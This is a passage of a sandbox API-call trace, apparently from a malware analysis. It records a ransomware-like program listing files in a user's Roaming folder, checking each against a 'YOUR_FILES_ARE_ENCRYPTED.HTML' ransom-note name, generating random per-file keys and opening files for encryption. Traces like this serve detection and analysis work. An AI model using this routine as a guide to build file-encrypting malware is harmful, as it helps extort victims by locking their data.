param_1="90") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="C9") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="FC") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B8") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="67") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="94") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D5") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="35") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="F3") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="91") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="6B") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="27") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="B9") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="11") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="5E") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="75") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="F2") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="20") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="05") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="CB") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="1D") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="3E") returned 2 [0164.962] wsprintfW (in: 
param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A9") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="FA") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="55") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="C2") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="79") returned 2 [0164.963] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi" [0164.963] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.963] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.978] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa17ff780, ftCreationTime.dwHighDateTime=0x1d7e5f7, ftLastAccessTime.dwLowDateTime=0xe9ec1290, ftLastAccessTime.dwHighDateTime=0x1d7e6e9, ftLastWriteTime.dwLowDateTime=0xe9ec1290, ftLastWriteTime.dwHighDateTime=0x1d7e6e9, nFileSizeHigh=0x0, nFileSizeLow=0x18745, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="cQrq8.bmp", cAlternateFileName="")) returned 1 [0164.978] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\cQrq8.bmp") returned 49 [0164.978] lstrcmpW (lpString1="cQrq8.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.978] PathFindExtensionW (pszPath="cQrq8.bmp") returned=".bmp" [0164.978] lstrlenW (lpString=".bmp") returned 4 [0164.978] PathFindExtensionW (pszPath="cQrq8.bmp") returned=".bmp" [0164.979] 
FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcc7c61b0, ftCreationTime.dwHighDateTime=0x1d7e009, ftLastAccessTime.dwLowDateTime=0x500e7960, ftLastAccessTime.dwHighDateTime=0x1d7e3c4, ftLastWriteTime.dwLowDateTime=0x500e7960, ftLastWriteTime.dwHighDateTime=0x1d7e3c4, nFileSizeHigh=0x0, nFileSizeLow=0x154be, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="dHf2m Cw8A.swf", cAlternateFileName="DHF2MC~1.SWF")) returned 1 [0164.979] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\dHf2m Cw8A.swf") returned 54 [0164.979] lstrcmpW (lpString1="dHf2m Cw8A.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.979] PathFindExtensionW (pszPath="dHf2m Cw8A.swf") returned=".swf" [0164.979] lstrlenW (lpString=".swf") returned 4 [0164.979] PathFindExtensionW (pszPath="dHf2m Cw8A.swf") returned=".swf" [0164.979] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7f61ca0, ftCreationTime.dwHighDateTime=0x1d7dae1, ftLastAccessTime.dwLowDateTime=0xfc35f370, ftLastAccessTime.dwHighDateTime=0x1d7e1ea, ftLastWriteTime.dwLowDateTime=0xfc35f370, ftLastWriteTime.dwHighDateTime=0x1d7e1ea, nFileSizeHigh=0x0, nFileSizeLow=0x10e51, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="E0cfMGggco.flv", cAlternateFileName="E0CFMG~1.FLV")) returned 1 [0164.979] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv") returned 54 [0164.979] lstrcmpW (lpString1="E0cfMGggco.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.979] PathFindExtensionW (pszPath="E0cfMGggco.flv") returned=".flv" [0164.979] lstrlenW (lpString=".flv") returned 4 [0164.979] PathFindExtensionW 
(pszPath="E0cfMGggco.flv") returned=".flv" [0164.979] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\e0cfmgggco.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.980] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=69201) returned 1 [0164.980] GetProcessHeap () returned 0x270000 [0164.980] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.981] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="66") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="BE") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="4B") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="6D") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="06") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="DB") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="21") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="0E") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="E9") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="92") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="C7") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="AD") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="C3") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda6a, 
param_2="%02X" | out: param_1="ED") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="ED") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="A5") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="BB") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="39") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="81") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="14") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="10") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="B8") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="DB") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="5E") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="58") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="C2") returned 2 [0164.982] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="C1") returned 2 [0164.982] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="B3") returned 2 [0164.982] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="F5") returned 2 [0164.982] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="0E") returned 2 [0164.982] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="5E") returned 2 [0164.982] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="0C") returned 2 [0164.982] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv" [0164.982] 
CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.982] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.995] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1307de70, ftCreationTime.dwHighDateTime=0x1d7dea2, ftLastAccessTime.dwLowDateTime=0x3625ef70, ftLastAccessTime.dwHighDateTime=0x1d7e6d4, ftLastWriteTime.dwLowDateTime=0x3625ef70, ftLastWriteTime.dwHighDateTime=0x1d7e6d4, nFileSizeHigh=0x0, nFileSizeLow=0x48a7, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="I0uQgvKvNStKM1d2e.pdf", cAlternateFileName="I0UQGV~1.PDF")) returned 1 [0164.995] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf") returned 61 [0164.995] lstrcmpW (lpString1="I0uQgvKvNStKM1d2e.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.995] PathFindExtensionW (pszPath="I0uQgvKvNStKM1d2e.pdf") returned=".pdf" [0164.995] lstrlenW (lpString=".pdf") returned 4 [0164.995] PathFindExtensionW (pszPath="I0uQgvKvNStKM1d2e.pdf") returned=".pdf" [0164.995] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\i0uqgvkvnstkm1d2e.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.996] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=18599) returned 1 [0164.996] GetProcessHeap () returned 0x270000 [0164.996] 
RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.997] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="9F") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="3F") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C7") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="B0") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="03") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="9A") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="B0") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="27") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="1A") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="82") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="08") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="F3") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="1A") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="C4") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="EC") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="C3") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="E2") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="AC") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="19") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="EC") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: 
param_1="BC") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="95") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F8") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="E1") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="92") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="EA") returned 2 [0164.998] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="EB") returned 2 [0164.998] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="3A") returned 2 [0164.998] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="70") returned 2 [0164.998] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="C5") returned 2 [0164.998] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="54") returned 2 [0164.998] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="0D") returned 2 [0164.998] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf" [0164.998] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.998] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0165.007] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x554b56c0, ftCreationTime.dwHighDateTime=0x1d7e0a7, ftLastAccessTime.dwLowDateTime=0xb6d35c50, ftLastAccessTime.dwHighDateTime=0x1d7e3c0, ftLastWriteTime.dwLowDateTime=0xb6d35c50, 
ftLastWriteTime.dwHighDateTime=0x1d7e3c0, nFileSizeHigh=0x0, nFileSizeLow=0x4690, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ib4hVk.png", cAlternateFileName="")) returned 1 [0165.009] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png") returned 50 [0165.009] lstrcmpW (lpString1="ib4hVk.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.009] PathFindExtensionW (pszPath="ib4hVk.png") returned=".png" [0165.009] lstrlenW (lpString=".png") returned 4 [0165.009] PathFindExtensionW (pszPath="ib4hVk.png") returned=".png" [0165.009] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\ib4hvk.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0165.009] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=18064) returned 1 [0165.010] GetProcessHeap () returned 0x270000 [0165.010] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0165.010] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="E2") returned 2 [0165.010] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="9D") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="27") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="86") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="3B") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="BF") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="8A") returned 2 [0165.011] 
wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="A7") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="9B") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="1A") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="BB") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="87") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="FA") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="56") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="09") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="89") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="38") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="EC") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="E8") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="59") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="DF") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="03") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="2C") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="7F") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="BF") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="D8") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="F1") returned 2 [0165.012] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="DB") returned 2 [0165.012] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: 
param_1="2A") returned 2 [0165.012] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="D2") returned 2 [0165.012] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="55") returned 2 [0165.012] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="46") returned 2 [0165.012] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png" [0165.012] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.012] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0165.024] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0165.024] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities") returned 50 [0165.024] GetProcessHeap () returned 0x270000 [0165.024] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.024] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities" [0165.024] 
lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\*" [0165.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d1c8e6, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0165.025] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d1c8e6, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.025] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d1c8e6, dwReserved1=0x0, cFileName="{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", cAlternateFileName="{B85DC~1")) returned 1 [0165.025] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}") returned 89 [0165.025] GetProcessHeap () returned 0x270000 [0165.025] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0165.025] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}" [0165.025] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\*" [0165.025] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, 